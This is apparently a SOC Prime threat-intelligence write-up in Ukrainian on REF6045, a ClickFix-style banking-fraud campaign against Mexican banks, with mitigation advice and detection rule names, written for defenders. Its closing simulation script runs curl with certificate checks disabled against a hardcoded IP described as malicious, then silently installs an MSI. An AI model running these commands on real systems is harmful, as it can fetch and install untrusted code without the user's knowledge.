SOC Prime Bias: Високий

08 Jul 2026 16:15 UTC

ClickFix до готівки: Аналіз інструментарію мексиканського банківського шахрайства

Author Photo
SOC Prime Team linkedin icon Стежити
ClickFix до готівки: Аналіз інструментарію мексиканського банківського шахрайства
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Резюме

REF6045 – це кампанія з банківського шахрайства за участі операторів, яка зосереджена на мексиканському фінансовому секторі. Вона використовує метод доставки в стилі ClickFix з фальшивими сторінками CAPTCHA, щоб переконати жертв запустити зловмисні команди PowerShell. Після інфекції комплект інструментів SCMBANKER дозволяє операторам-людям спостерігати за банківськими сесіями, захоплювати скріншоти, змінювати вміст буфера обміну та розгортати віддалене керування Remote Utilities для повного віддаленого контролю.

Розслідування

Лабораторії безпеки Elastic виявили загрозу після виявлення підозрілого bitsadmin активність, яка завантажувала PowerShell-скрипти з відкритого каталогу. Розслідування викрило весь комплект інструментів через архів кореневого веб-доступу, zkt.zip, і виявило основні недоліки в операційній безпеці, включаючи неавтентифіковані редактори файлів і відкриті каталоги на інфраструктурі командування та управління. Аналіз також показав, що в комплекті інструментів містяться обширні AI-згенеровані артефакти в його кодовій базі.

Пом’якшення

Організації повинні обмежити використання PowerShell і bitsadmin для схвалених користувачів та провадити строго контрольоване виконання. Користувачів слід навчати розпізнавати приманки соціальної інженерії, такі як фальшиві підказки CAPTCHA або фальшиві екрани оновлення Windows. Команди безпеки також повинні розгорнути сильний моніторинг підозрілих змін в реєстрі та несанкціонованої установки програмного забезпечення для віддаленого доступу.

Відповідь

Якщо ця активність виявлена, негайно ізолюйте уражені системи, щоб зупинити комунікацію командування та управління і можливу крадіжку даних. Проведіть судово-медичне розслідування, щоб визначити масштаб компрометації та перевірте на наявність Remote Utilities або несанкціонованих змін в реєстрі. Скиньте паролі для всіх фінансових та інших чутливих облікових записів, які були доступні з уражених машин.

Потік Атак

Виявлення

MsiExec, породжений процесом оболонки (через cmdline)

Команда SOC Prime
08 лип. 2026

Виконання Attrib для криючих файлів (через cmdline)

Команда SOC Prime
08 лип. 2026

Підозрілі файли в публічному профілі користувача (через file_event)

Команда SOC Prime
08 лип. 2026

Можливість виконання через приховані командні лінії PowerShell (через cmdline)

Команда SOC Prime
08 лип. 2026

Використання вимкнення для примусового припинення або перезавантаження системи (через cmdline)

Команда SOC Prime
08 лип. 2026

LOLBAS Bitsadmin (через cmdline)

Команда SOC Prime
08 лип. 2026

Можлива затримка виконання (через cmdline)

Команда SOC Prime
08 лип. 2026

Можливий облік або маніпуляція з групами (через cmdline)

Команда SOC Prime
08 лип. 2026

Microsoft Edge породжує незвичайний процес (через cmdline)

Команда SOC Prime
08 лип. 2026

Підозріле використання CURL (через cmdline)

Команда SOC Prime
08 лип. 2026

Підозріле місцезнаходження виконання/скрипта через [cmd.exe /C] (через cmdline)

Команда SOC Prime
08 лип. 2026

Виявлення SCMBANKER і установлення Remote Utilities [Створення процесу Windows]

AI правила SOC Prime
08 лип. 2026

Виявлення активності SCMBANKER Toolkit [Windows Powershell]

AI правила SOC Prime
08 лип. 2026

Виконання симуляції

Передумова: попередні телеметрія та опитування повинні бути пройдені.

Мотив: Цей розділ деталізує точне виконання техніки противника (TTP), розробленої для активації правила виявлення. Команди та розповідь МУТЬ безпосередньо відображати виявлені TTP та прагнуть згенерувати точну телеметрію, що очікується логікою виявлення. Абстрактні або неспоріднені приклади призведуть до неправильної діагностики.

  • Опис атаки та команди: Противник намагається закріпитися на цільовій системі, імітуючи шаблон банківського шахрайства REF6045. Спочатку вони намагаються завантажити файл перевірки з жорстко заданої IP-адреси, що містить шкідливий код (68.211.161.46) з використанням curl з прапорцем -k (незахищений), щоб обійти перевірку SSL-сертифікатів. Після завантаження противник здійснює тиху установку шкідливого інструменту віддаленого доступу із застосуванням msiexec.exe з прапорцем /i (установка) та /quiet (тихий) перемикачі, цілеспрямовано на файл на ім’я hosts.msi. Це надає їм постійний віддалений доступ, мінімізуючи взаємодію з користувачем.

  • Скрипт регресійного тестування:

    # Скрипт симуляції для TTP REF6045
    # Цей скрипт імітує конкретні командні лінії, визначені в правилі виявлення.
    
    $WorkDir = "$env:TEMPSimulation"
    if (!(Test-Path $WorkDir)) { New-Item -ItemType Directory -Path $WorkDir }
    Set-Location $WorkDir
    
    Write-Host "[+] Етап 1: Імітація передачі інструмента через curl..." -ForegroundColor Cyan
    # Примітка: Використовується фейковий файл через curl, щоб уникнути фактичного зловмисного трафіку, 
    # але зберігаючи точний командний рядок, необхідний для виявлення.
    cmd /c curl -k https://68.211.161.46/validation.txt
    
    Write-Host "[+] Етап 2: Імітація тихої установки MSI..." -ForegroundColor Cyan
    # Створіть фейковий MSI файл, щоб msiexec не виходив одразу з помилкою (хоча правило спрацьовує на командному рядку)
    # З метою виключно тестування ЛОГІКИ ВИЯВЛЕННЯ (командного рядка), 
    # ми виконуватимемо точну командну строку.
    msiexec /i "hosts.msi" /quiet /norestart
  • Команди очищення:

    # Скрипт очищення для видалення артефактів
    $WorkDir = "$env:TEMPSimulation"
    if (Test-Path $WorkDir) {
        Remove-Item -Recurse -Force $WorkDir
        Write-Host "[+] Очищення завершено: $WorkDir видалено." -ForegroundColor Green
    } else {
        Write-Host "[!] Очищення пропущено: Директорію не знайдено." -ForegroundColor Yellow
    }